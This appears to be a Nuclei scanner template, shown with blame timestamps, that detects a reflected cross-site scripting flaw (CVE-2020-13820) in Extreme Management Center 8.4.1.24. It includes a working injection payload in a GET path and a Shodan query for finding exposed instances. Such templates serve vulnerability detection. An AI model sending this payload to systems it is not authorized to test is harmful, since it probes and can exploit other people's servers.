2022-09-28 19:19:03 +00:00
id : CVE-2020-13820
2022-09-29 05:04:58 +00:00
2022-09-28 19:19:03 +00:00
info :
2022-10-10 19:22:59 +00:00
name : Extreme Management Center 8.4.1.24 - Cross-Site Scripting
2022-09-28 19:19:03 +00:00
author : tess
severity : medium
2022-09-29 05:04:58 +00:00
description : |
2022-10-10 19:22:59 +00:00
Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-09-28 19:19:03 +00:00
reference :
- https://medium.com/@0x00crash/xss-reflected-in-extreme-management-center-8-4-1-24-cve-2020-13820-c6febe951219
2022-09-28 19:28:50 +00:00
- https://gtacknowledge.extremenetworks.com/articles/Solution/000051136
2022-09-29 07:17:27 +00:00
- https://gtacknowledge.extremenetworks.com
2022-10-10 19:22:59 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-13820
2023-07-11 19:49:27 +00:00
- https://documentation.extremenetworks.com/release_notes/netsight/XMC_8.5.0_Release_Notes.pdf
2022-09-28 19:19:03 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2020-13820
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00237
cpe : cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:*
2022-09-29 04:56:37 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-09-29 04:56:37 +00:00
shodan-query : title:"Extreme Management Center"
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : extremenetworks
product : extreme_management_center
2022-09-29 07:01:42 +00:00
tags : cve,cve2020,xss,extremenetworks
2022-09-29 04:56:37 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-28 19:19:03 +00:00
- method : GET
path :
2022-09-29 04:57:32 +00:00
- "{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"
2022-09-28 19:19:03 +00:00
matchers-condition : and
matchers :
- type : word
2022-09-28 19:28:50 +00:00
part : body
2022-09-28 19:19:03 +00:00
words :
- "autofocus onfocus='alert(document.domain)"
2022-09-29 04:56:37 +00:00
- "Extreme Management Center"
2022-09-28 19:19:03 +00:00
condition : and
2022-09-29 05:04:58 +00:00
- type : word
part : header
words :
- text/html
2022-09-28 19:19:03 +00:00
- type : status
status :
- 200